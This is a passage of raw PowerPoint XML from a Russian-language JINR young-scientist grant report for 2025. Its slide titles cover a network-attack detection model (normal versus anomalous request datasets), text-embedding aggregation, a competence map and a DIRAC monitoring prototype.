          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="283" name="Рисунок 282"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect r="9532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9484200" y="4662720"/>
            <a:ext cx="2587680" cy="1234440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="PlaceHolder 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360" y="89385"/>
            <a:ext cx="12189960" cy="4001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6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Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Сбор и предобработка данных</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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58995244-5ADE-40A6-AF7A-DC22A7881391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C7DEBAF-BC5E-47E6-9E69-1F2682ED3E43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90ADB49-2757-45F4-A360-F73C15669618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7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Прямоугольник: скругленные углы 284"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481680" y="655560"/>
            <a:ext cx="5209920" cy="5081040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5071"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="27000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FF0000">
                  <a:alpha val="27000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill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7" name="Прямоугольник 286"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517680" y="5738040"/>
            <a:ext cx="5090040" cy="34488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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFD7D7"/>
                </a:highlight>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Группа аномальных запросов: anomaly.csv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8" name="Прямоугольник: скругленные углы 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479280" y="644760"/>
            <a:ext cx="5209920" cy="5081040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5071"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DDE8CB"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="00A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9" name="Прямоугольник 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705360" y="5727240"/>
            <a:ext cx="4851360" cy="36396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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00A933"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="DDE8CB"/>
                </a:highlight>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Группа нормальных запросов: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00A933"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="DDE8CB"/>
                </a:highlight>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>norm.csv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0" name="PlaceHolder 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720" y="89385"/>
            <a:ext cx="12189960" cy="4001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6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Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Сбор и предобработка данных</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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pic>
        <p:nvPicPr>
          <p:cNvPr id="291" name="Рисунок 290"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="12115"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="468720" y="3008520"/>
            <a:ext cx="4938120" cy="3254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2" name="Рисунок 291"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-531720" y="488160"/>
            <a:ext cx="4416480" cy="3312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3" name="Рисунок 292"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002680" y="488160"/>
            <a:ext cx="4579200" cy="3434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4" name="Рисунок 293"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect t="10718"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7785000" y="3048120"/>
            <a:ext cx="2614320" cy="2678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5" name="Рисунок 294"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404320" y="475200"/>
            <a:ext cx="4653360" cy="3489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6" name="Рисунок 295"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7961760" y="400680"/>
            <a:ext cx="4793760" cy="359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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5972F7E4-D78E-4517-BBDA-A6D9081A0D33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49637B5B-6726-4BEB-931F-3BA340ED2667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F13E448-ECA7-4A74-BA1A-B4BB311367D9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8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Прямоугольник: скругленные углы 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481680" y="655560"/>
            <a:ext cx="5209920" cy="5081040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5071"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="27000"/>
            </a:blip>
            <a:srcRect/>
            <a:tile tx="0" ty="0" sx="100000" sy="100000" algn="ctr"/>
          </a:blipFill>
          <a:ln w="19080">
            <a:solidFill>
              <a:srgbClr val="99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36360" rIns="81360" bIns="3636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9" name="Прямоугольник 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517680" y="5738040"/>
            <a:ext cx="5090760" cy="36396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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="DEE6EF"/>
                </a:highlight>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Группа аномальных запросов: anomaly.csv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0" name="Прямоугольник: скругленные углы 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479280" y="644760"/>
            <a:ext cx="5209920" cy="5081040"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5071"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FFFFFF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DDE8CB"/>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="38160">
            <a:solidFill>
              <a:srgbClr val="00A933"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="266760" dist="107932" dir="8100000" rotWithShape="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720" tIns="45000" rIns="9072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1" name="Прямоугольник 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705360" y="5727240"/>
            <a:ext cx="4851360" cy="36396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u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00A933"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="DDE8CB"/>
                </a:highlight>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Группа нормальных запросов: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00A933"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="DDE8CB"/>
                </a:highlight>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>norm.csv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2" name="PlaceHolder 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720" y="89385"/>
            <a:ext cx="12189960" cy="4001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600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Модель обнаружения сетевых атак. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Сбор и предобработка данных</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" b="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Рисунок 302"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:grayscl/>
          </a:blip>
          <a:srcRect t="12115"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="468720" y="3008520"/>
            <a:ext cx="4938120" cy="3254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4" name="Рисунок 303"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:grayscl/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-531720" y="488160"/>
            <a:ext cx="4416480" cy="3312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5" name="Рисунок 304"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:grayscl/>
          </a:blip>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002680" y="488160"/>
            <a:ext cx="4579200" cy="3434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6" name="Рисунок 305"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect t="10718"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7785000" y="3048120"/>
            <a:ext cx="2614320" cy="2678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7" name="Рисунок 306"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404320" y="475200"/>
            <a:ext cx="4653360" cy="3489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8" name="Рисунок 307"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7961760" y="400680"/>
            <a:ext cx="4793760" cy="359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9" name="Рисунок 308"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="398160" y="620280"/>
            <a:ext cx="5373360" cy="5548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Дата 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F79F392-49C8-44E9-9323-986144EB2B3F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03.12.2025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681E3D76-2872-4735-AC83-8A8E20329058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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Ильина А. В. Отчет о выполнении работ, финансируемых грантом молодых ученых и специалистов ОИЯИ за 2025 год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843A426-4EC4-46F4-A50E-A92A0DF04B7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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959A5C-AE1B-480D-AB98-9213D3012DF8}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" u="none" strike="noStrike" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>9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Ромбовидная сетка, 16 х 9">
  <a:themeElements>
    <a:clrScheme name="Синий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2132</TotalTime>
  <Words>5095</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>591</Paragraphs>
  <Slides>52</Slides>
  <Notes>11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Courier New</vt:lpstr>
      <vt:lpstr>Noto Mono</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>system-ui</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>Ромбовидная сетка, 16 х 9</vt:lpstr>
      <vt:lpstr>Заявка на соискание грантов молодых ученых и специалистов ОИЯИ, стипендий им. М.Г. Мещерякова и Н.Н. Говоруна на 2026 год</vt:lpstr>
      <vt:lpstr>Актуальность работы</vt:lpstr>
      <vt:lpstr>Задачи, объявленные на 2025 год</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Выполненные работы за 2025 год</vt:lpstr>
      <vt:lpstr>Выполненные работы за 2025 год. Модель обнаружения сетевых атак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Выполненные работы за 2025 год</vt:lpstr>
      <vt:lpstr>Исследование методов агрегации векторных представлений текстов различных семантических пространств. Семантическое пространство</vt:lpstr>
      <vt:lpstr>Исследование методов агрегации векторных представлений текстов различных семантических пространств. Проблема агрегации результатов</vt:lpstr>
      <vt:lpstr>Исследование методов агрегации векторных представлений текстов различных семантических пространств. Использованные методы агрегации</vt:lpstr>
      <vt:lpstr>Исследование методов агрегации векторных представлений текстов различных семантических пространств. Использованные методы оценки устойчивости агрегированных результатов</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Выполненные работы за 2025 год</vt:lpstr>
      <vt:lpstr>Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ</vt:lpstr>
      <vt:lpstr>Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ</vt:lpstr>
      <vt:lpstr>Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ. Семантический поиск по накопленной базе</vt:lpstr>
      <vt:lpstr>Цифровая карта компетенций по детекторным и ускорительным технологиям ОИЯИ. Семантический поиск по накопленной базе</vt:lpstr>
      <vt:lpstr>Выполненные работы за 2025 год</vt:lpstr>
      <vt:lpstr>прототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC</vt:lpstr>
      <vt:lpstr>прототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. Пример практического применения</vt:lpstr>
      <vt:lpstr>прототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. Пример практического применения</vt:lpstr>
      <vt:lpstr>прототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. Пример практического применения</vt:lpstr>
      <vt:lpstr>прототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. Проблема оценки производительности многоядерных задач (выявлена в IHEP, 2024) и предлагаемое решение</vt:lpstr>
      <vt:lpstr>прототип веб-приложения для мониторинга производительности вычислительных ресурсов, интегрированных в инфраструктуру DIRAC. Проблема оценки производительности многоядерных задач (выявлена в IHEP, 2024) и предлагаемое решение</vt:lpstr>
      <vt:lpstr>План работ на 2026 г.</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Презентация PowerPoint</vt:lpstr>
      <vt:lpstr>Спасибо за внимание!</vt:lpstr>
      <vt:lpstr>Дополнительные слайды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расчета коэффициента конкордации Кендалла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Dataflow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выполнении работ, финансируемы грантом молодых ученых и специалистов ОИЯИ за 2024 год</dc:title>
  <dc:subject/>
  <dc:creator>Anna Ilina</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>Анна Ильина</cp:lastModifiedBy>
  <cp:revision>300</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-12-10T13:01:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-03T10:44:03Z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1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Notes">
    <vt:i4>1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21</vt:i4>
  </property>
</Properties>
</file>